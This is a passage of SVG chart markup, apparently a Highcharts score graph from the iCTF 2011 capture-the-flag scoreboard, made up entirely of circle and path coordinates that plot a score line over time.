stroke-width="0.000001" fill="#ff0066"></circle><circle cx="146.01884191176472" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="144.49080882352942" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="142.96277573529412" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="141.43474264705884" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="139.90670955882354" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="138.37867647058823" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="136.85064338235296" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="135.32261029411765" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="133.79457720588235" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="132.26654411764707" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="130.73851102941177" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="129.21047794117646" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="127.68244485294119" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="126.15441176470588" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="124.6263786764706" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="123.0983455882353" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="121.5703125" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="120.04227941176471" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="118.51424632352942" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="116.98621323529413" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="115.45818014705883" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="113.93014705882354" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="112.40211397058825" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="110.87408088235294" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="109.34604779411765" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="107.81801470588236" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="106.28998161764706" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="104.76194852941177" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="103.23391544117648" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="101.70588235294119" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="100.17784926470588" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="98.6498161764706" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="97.1217830882353" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="95.59375" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="94.06571691176471" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="92.53768382352942" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="91.00965073529413" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="89.48161764705883" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="87.95358455882354" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="86.42555147058825" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="84.89751838235294" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="83.36948529411765" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="81.84145220588236" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="80.31341911764706" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="78.78538602941177" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="77.25735294117648" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="75.72931985294119" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="74.20128676470588" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="72.6732536764706" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="71.1452205882353" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="69.6171875" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="68.08915441176471" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="66.56112132352942" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="65.03308823529412" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="63.505055147058826" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="61.977022058823536" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="60.44898897058824" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="58.92095588235295" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="57.39292279411765" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="55.864889705882355" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="54.336856617647065" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="52.80882352941177" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="51.28079044117648" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="49.75275735294118" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="48.224724264705884" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="46.69669117647059" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="45.16865808823529" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="43.640625" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="42.1125919117647" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="40.58455882352941" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="39.056525735294116" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="37.528492647058826" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="36.00045955882353" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="34.47242647058823" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="32.94439338235294" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="31.416360294117645" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="29.88832720588235" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="28.360294117647058" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="26.832261029411764" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="25.30422794117647" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="23.776194852941178" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="22.248161764705884" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="20.72012867647059" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="19.192095588235297" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="17.6640625" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="16.136029411764707" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="14.607996323529413" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="13.07996323529412" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="11.551930147058824" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="10.02389705882353" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="8.495863970588236" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="6.967830882352942" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="5.439797794117648" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><circle cx="3.9117647058823533" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1580)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 235.71889157333374 L 94.06571691176471 235.71889157333374 L 95.59375 235.71889157333374 L 97.1217830882353 235.71889157333374 L 98.6498161764706 235.71889157333374 L 100.17784926470588 235.71889157333374 L 101.70588235294119 235.71889157333374 L 103.23391544117648 235.71889157333374 L 104.76194852941177 235.71889157333374 L 106.28998161764706 235.71889157333374 L 107.81801470588236 235.71889157333374 L 109.34604779411765 235.71889157333374 L 110.87408088235294 235.71889157333374 L 112.40211397058825 235.71889157333374 L 113.93014705882354 235.71889157333374 L 115.45818014705883 235.71889157333374 L 116.98621323529413 235.71889157333374 L 118.51424632352942 235.71889157333374 L 120.04227941176471 235.71889157333374 L 121.5703125 235.71889157333374 L 123.0983455882353 235.71889157333374 L 124.6263786764706 235.71889157333374 L 126.15441176470588 235.71889157333374 L 127.68244485294119 235.71889157333374 L 129.21047794117646 235.71889157333374 L 130.73851102941177 235.71889157333374 L 132.26654411764707 235.71889157333374 L 133.79457720588235 235.71889157333374 L 135.32261029411765 235.71889157333374 L 136.85064338235296 235.71889157333374 L 138.37867647058823 235.71889157333374 L 139.90670955882354 235.71889157333374 L 141.43474264705884 235.71889157333374 L 142.96277573529412 235.71889157333374 L 144.49080882352942 235.71889157333374 L 146.01884191176472 235.71889157333374 L 147.546875 235.71889157333374 L 149.0749080882353 235.71889157333374 L 150.6029411764706 235.71889157333374 L 152.13097426470588 235.71889157333374 L 153.6590073529412 235.71889157333374 L 155.18704044117646 235.71889157333374 L 156.71507352941177 235.71889157333374 L 158.24310661764707 235.71889157333374 L 159.77113970588235 235.71889157333374 L 161.29917279411765 235.71889157333374 L 162.82720588235296 235.71889157333374 L 164.35523897058823 235.71889157333374 L 165.88327205882354 235.71889157333374 L 167.41130514705884 235.71889157333374 L 168.93933823529412 225.88482437333371 L 170.46737132352942 218.59612037333375 L 171.99540441176472 209.20516517333374 L 173.5234375 204.2245507733337 L 175.0514705882353 204.2245507733337 L 176.5795036764706 204.2245507733337 L 178.10753676470588 204.2245507733337 L 179.6355698529412 204.2245507733337 L 181.1636029411765 204.2245507733337 L 182.69163602941177 204.2245507733337 L 184.21966911764707 204.2245507733337 L 185.74770220588235 204.2245507733337 L 187.27573529411765 204.2245507733337 L 188.80376838235296 204.2245507733337 L 190.33180147058823 204.2245507733337 L 191.85983455882354 204.2245507733337 L 193.38786764705884 204.12039271466696 L 194.91590073529412 204.12039271466696 L 196.44393382352942 204.12039271466696 L 197.97196691176472 204.12039271466696 L 199.5 204.12039271466696 L 201.0280330882353 204.12039271466696 L 202.5560661764706 202.50390119466698 L 204.08409926470588 201.73298932266698 L 205.6121323529412 200.99941370666699 L 207.1401654411765 200.0549988693337 L 208.66819852941177 200.0549988693337 L 210.19623161764707 200.0549988693337 L 211.72426470588235 200.0549988693337 L 213.25229779411765 200.0549988693337 L 214.78033088235296 200.0549988693337 L 216.30836397058823 200.0549988693337 L 217.83639705882354 200.0549988693337 L 219.36443014705884 200.0549988693337 L 220.89246323529412 200.0549988693337 L 222.42049632352942 200.0549988693337 L 223.94852941176472 200.0549988693337 L 225.4765625 200.0549988693337 L 227.0045955882353 200.0549988693337 L 228.5326286764706 200.0549988693337 L 230.06066176470588 200.0549988693337 L 231.5886948529412 200.0549988693337 L 233.1167279411765 200.0549988693337 L 234.64476102941177 200.0549988693337 L 236.17279411764707 200.0549988693337 L 237.70082720588238 200.0549988693337 L 239.22886029411765 200.0549988693337 L 240.75689338235296 200.0549988693337 L 242.28492647058823 200.0549988693337 L 243.81295955882354 200.0549988693337 L 245.34099264705884 200.0549988693337 L 246.86902573529412 200.0549988693337 L 248.39705882352942 200.0549988693337 L 249.92509191176472 200.0549988693337 L 251.453125 200.0549988693337 L 252.9811580882353 200.0549988693337 L 254.5091911764706 200.0549988693337 L 256.0372242647059 200.0549988693337 L 257.56525735294116 200.0549988693337 L 259.09329044117646 200.0549988693337 L 260.62132352941177 200.0549988693337 L 262.1493566176471 200.0549988693337 L 263.6773897058824 200.0549988693337 L 265.2054227941177 200.0549988693337 L 266.7334558823529 200.0549988693337 L 268.26148897058823 200.0549988693337 L 269.78952205882354 200.0549988693337 L 271.31755514705884 200.0549988693337 L 272.84558823529414 200.0549988693337 L 274.37362132352945 200.0549988693337 L 275.9016544117647 200.0549988693337 L 277.4296875 200.04850936533373 L 278.9577205882353 200.04850936533373 L 280.4857536764706 200.04850936533373 L 282.0137867647059 200.04850936533373 L 283.54181985294116 200.04850936533373 L 285.06985294117646 200.04850936533373 L 286.59788602941177 200.04850936533373 L 288.1259191176471 200.04850936533373 L 289.6539522058824 200.04850936533373 L 291.1819852941177 200.04850936533373 L 292.7100183823529 200.04850936533373 L 294.23805147058823 200.04850936533373 L 295.76608455882354 200.04850936533373 L 297.29411764705884 200.04850936533373 L 298.82215073529414 200.04850936533373 L 300.35018382352945 200.04850936533373 L 301.8782169117647 200.04850936533373 L 303.40625 200.04850936533373 L 304.9342830882353 200.02203512533373 L 306.4623161764706 200.02203512533373 L 307.9903492647059 200.02203512533373 L 309.51838235294116 200.02203512533373 L 311.04641544117646 200.02203512533373 L 312.57444852941177 200.02203512533373 L 314.1024816176471 200.02203512533373 L 315.6305147058824 200.02203512533373 L 317.1585477941177 200.02203512533373 L 318.6865808823529 200.02203512533373 L 320.21461397058823 200.02203512533373 L 321.74264705882354 200.02203512533373 L 323.27068014705884 200.02203512533373 L 324.79871323529414 200.02203512533373 L 326.32674632352945 200.02203512533373 L 327.8547794117647 200.02203512533373 L 329.3828125 200.02203512533373 L 330.9108455882353 200.02203512533373 L 332.4388786764706 200.02203512533373 L 333.9669117647059 200.02203512533373 L 335.4949448529412 200.02203512533373 L 337.02297794117646 200.02203512533373 L 338.55101102941177 200.02203512533373 L 340.0790441176471 200.02203512533373 L 341.6070772058824 189.59691512533374 L 343.1351102941177 176.7312869653337 L 344.6631433823529 176.4515669653337 L 346.19117647058823 167.06533592533373 L 347.71920955882354 158.02734296533373 L 349.24724264705884 158.02734296533373 L 350.77527573529414 158.02734296533373 L 352.30330882352945 158.02734296533373 L 353.8313419117647 158.02734296533373 L 355.359375 158.00342379733374 L 356.8874080882353 158.00342379733374 L 358.4154411764706 158.00342379733374 L 359.9434742647059 158.00342379733374 L 361.4715073529412 158.00342379733374 L 362.99954044117646 158.00342379733374 L 364.52757352941177 158.00342379733374 L 366.0556066176471 158.00342379733374 L 367.5836397058824 158.00342379733374 L 369.1116727941177 157.93593579733374 L 370.6397058823529 157.93593579733374 L 372.16773897058823 154.4940477973337 L 373.69577205882354 146.7842186773337 L 375.22380514705884 143.32410891733372 L 376.75183823529414 143.32410891733372 L 378.27987132352945 143.32410891733372 L 379.8079044117647 143.32410891733372 L 381.3359375 143.32410891733372 L 382.8639705882353 143.32410891733372 L 384.3920036764706 143.32410891733372 L 385.9200367647059 143.32410891733372 L 387.4480698529412 143.32410891733372 L 388.97610294117646 143.32410891733372 L 390.50413602941177 142.3957660906671 L 392.0321691176471 138.82611659733573 L 393.5602022058824 138.82611659733573 L 395.0882352941177 138.82611659733573" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 235.71889157333374 L 94.06571691176471 235.71889157333374 L 95.59375 235.71889157333374 L 97.1217830882353 235.71889157333374 L 98.6498161764706 235.71889157333374 L 100.17784926470588 235.71889157333374 L 101.70588235294119 235.71889157333374 L 103.23391544117648 235.71889157333374 L 104.76194852941177 235.71889157333374 L 106.28998161764706 235.71889157333374 L 107.81801470588236 235.71889157333374 L 109.34604779411765 235.71889157333374 L 110.87408088235294 235.71889157333374 L 112.40211397058825 235.71889157333374 L 113.93014705882354 235.71889157333374 L 115.45818014705883 235.71889157333374 L 116.98621323529413 235.71889157333374 L 118.51424632352942 235.71889157333374 L 120.04227941176471 235.71889157333374 L 121.5703125 235.71889157333374 L 123.0983455882353 235.71889157333374 L 124.6263786764706 235.71889157333374 L 126.15441176470588 235.71889157333374 L 127.68244485294119 235.71889157333374 L 129.21047794117646 235.71889157333374 L 130.73851102941177 235.71889157333374 L 132.26654411764707 235.71889157333374 L 133.79457720588235 235.71889157333374 L 135.32261029411765 235.71889157333374 L 136.85064338235296 235.71889157333374 L 138.37867647058823 235.71889157333374 L 139.90670955882354 235.71889157333374 L 141.43474264705884 235.71889157333374 L 142.96277573529412 235.71889157333374 L 144.49080882352942 235.71889157333374 L 146.01884191176472 235.71889157333374 L 147.546875 235.71889157333374 L 149.0749080882353 235.71889157333374 L 150.6029411764706 235.71889157333374 L 152.13097426470588 235.71889157333374 L 153.6590073529412 235.71889157333374 L 155.18704044117646 235.71889157333374 L 156.71507352941177 235.71889157333374 L 158.24310661764707 235.71889157333374 L 159.77113970588235 235.71889157333374 L 161.29917279411765 235.71889157333374 L 162.82720588235296 235.71889157333374 L 164.35523897058823 235.71889157333374 L 165.88327205882354 235.71889157333374 L 167.41130514705884 235.71889157333374 L 168.93933823529412 225.88482437333371 L 170.46737132352942 218.59612037333375 L 171.99540441176472 209.20516517333374 L 173.5234375 204.2245507733337 L 175.0514705882353 204.2245507733337 L 176.5795036764706 204.2245507733337 L 178.10753676470588 204.2245507733337 L 179.6355698529412 204.2245507733337 L 181.1636029411765 204.2245507733337 L 182.69163602941177 204.2245507733337 L 184.21966911764707 204.2245507733337 L 185.74770220588235 204.2245507733337 L 187.27573529411765 204.2245507733337 L 188.80376838235296 204.2245507733337 L 190.33180147058823 204.2245507733337 L 191.85983455882354 204.2245507733337 L 193.38786764705884 204.12039271466696 L 194.91590073529412 204.12039271466696 L 196.44393382352942 204.12039271466696 L 197.97196691176472 204.12039271466696 L 199.5 204.12039271466696 L 201.0280330882353 204.12039271466696 L 202.5560661764706 202.50390119466698 L 204.08409926470588 201.73298932266698 L 205.6121323529412 200.99941370666699 L 207.1401654411765 200.0549988693337 L 208.66819852941177 200.0549988693337 L 210.19623161764707 200.0549988693337 L 211.72426470588235 200.0549988693337 L 213.25229779411765 200.0549988693337 L 214.78033088235296 200.0549988693337 L 216.30836397058823 200.0549988693337 L 217.83639705882354 200.0549988693337 L 219.36443014705884 200.0549988693337 L 220.89246323529412 200.0549988693337 L 222.42049632352942 200.0549988693337 L 223.94852941176472 200.0549988693337 L 225.4765625 200.0549988693337 L 227.0045955882353 200.0549988693337 L 228.5326286764706 200.0549988693337 L 230.06066176470588 200.0549988693337 L 231.5886948529412 200.0549988693337 L 233.1167279411765 200.0549988693337 L 234.64476102941177 200.0549988693337 L 236.17279411764707 200.0549988693337 L 237.70082720588238 200.0549988693337 L 239.22886029411765 200.0549988693337 L 240.75689338235296 200.0549988693337 L 242.28492647058823 200.0549988693337 L 243.81295955882354 200.0549988693337 L 245.34099264705884 200.0549988693337 L 246.86902573529412 200.0549988693337 L 248.39705882352942 200.0549988693337 L 249.92509191176472 200.0549988693337 L 251.453125 200.0549988693337 L 252.9811580882353 200.0549988693337 L 254.5091911764706 200.0549988693337 L 256.0372242647059 200.0549988693337 L 257.56525735294116 200.0549988693337 L 259.09329044117646 200.0549988693337 L 260.62132352941177 200.0549988693337 L 262.1493566176471 200.0549988693337 L 263.6773897058824 200.0549988693337 L 265.2054227941177 200.0549988693337 L 266.7334558823529 200.0549988693337 L 268.26148897058823 200.0549988693337 L 269.78952205882354 200.0549988693337 L 271.31755514705884 200.0549988693337 L 272.84558823529414 200.0549988693337 L 274.37362132352945 200.0549988693337 L 275.9016544117647 200.0549988693337 L 277.4296875 200.04850936533373 L 278.9577205882353 200.04850936533373 L 280.4857536764706 200.04850936533373 L 282.0137867647059 200.04850936533373 L 283.54181985294116 200.04850936533373 L 285.06985294117646 200.04850936533373 L 286.59788602941177 200.04850936533373 L 288.1259191176471 200.04850936533373 L 289.6539522058824 200.04850936533373 L 291.1819852941177 200.04850936533373 L 292.7100183823529 200.04850936533373 L 294.23805147058823 200.04850936533373 L 295.76608455882354 200.04850936533373 L 297.29411764705884 200.04850936533373 L 298.82215073529414 200.04850936533373 L 300.35018382352945 200.04850936533373 L 301.8782169117647 200.04850936533373 L 303.40625 200.04850936533373 L 304.9342830882353 200.02203512533373 L 306.4623161764706 200.02203512533373 L 307.9903492647059 200.02203512533373 L 309.51838235294116 200.02203512533373 L 311.04641544117646 200.02203512533373 L 312.57444852941177 200.02203512533373 L 314.1024816176471 200.02203512533373 L 315.6305147058824 200.02203512533373 L 317.1585477941177 200.02203512533373 L 318.6865808823529 200.02203512533373 L 320.21461397058823 200.02203512533373 L 321.74264705882354 200.02203512533373 L 323.27068014705884 200.02203512533373 L 324.79871323529414 200.02203512533373 L 326.32674632352945 200.02203512533373 L 327.8547794117647 200.02203512533373 L 329.3828125 200.02203512533373 L 330.9108455882353 200.02203512533373 L 332.4388786764706 200.02203512533373 L 333.9669117647059 200.02203512533373 L 335.4949448529412 200.02203512533373 L 337.02297794117646 200.02203512533373 L 338.55101102941177 200.02203512533373 L 340.0790441176471 200.02203512533373 L 341.6070772058824 189.59691512533374 L 343.1351102941177 176.7312869653337 L 344.6631433823529 176.4515669653337 L 346.19117647058823 167.06533592533373 L 347.71920955882354 158.02734296533373 L 349.24724264705884 158.02734296533373 L 350.77527573529414 158.02734296533373 L 352.30330882352945 158.02734296533373 L 353.8313419117647 158.02734296533373 L 355.359375 158.00342379733374 L 356.8874080882353 158.00342379733374 L 358.4154411764706 158.00342379733374 L 359.9434742647059 158.00342379733374 L 361.4715073529412 158.00342379733374 L 362.99954044117646 158.00342379733374 L 364.52757352941177 158.00342379733374 L 366.0556066176471 158.00342379733374 L 367.5836397058824 158.00342379733374 L 369.1116727941177 157.93593579733374 L 370.6397058823529 157.93593579733374 L 372.16773897058823 154.4940477973337 L 373.69577205882354 146.7842186773337 L 375.22380514705884 143.32410891733372 L 376.75183823529414 143.32410891733372 L 378.27987132352945 143.32410891733372 L 379.8079044117647 143.32410891733372 L 381.3359375 143.32410891733372 L 382.8639705882353 143.32410891733372 L 384.3920036764706 143.32410891733372 L 385.9200367647059 143.32410891733372 L 387.4480698529412 143.32410891733372 L 388.97610294117646 143.32410891733372 L 390.50413602941177 142.3957660906671 L 392.0321691176471 138.82611659733573 L 393.5602022058824 138.82611659733573 L 395.0882352941177 138.82611659733573" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 235.71889157333374 L 94.06571691176471 235.71889157333374 L 95.59375 235.71889157333374 L 97.1217830882353 235.71889157333374 L 98.6498161764706 235.71889157333374 L 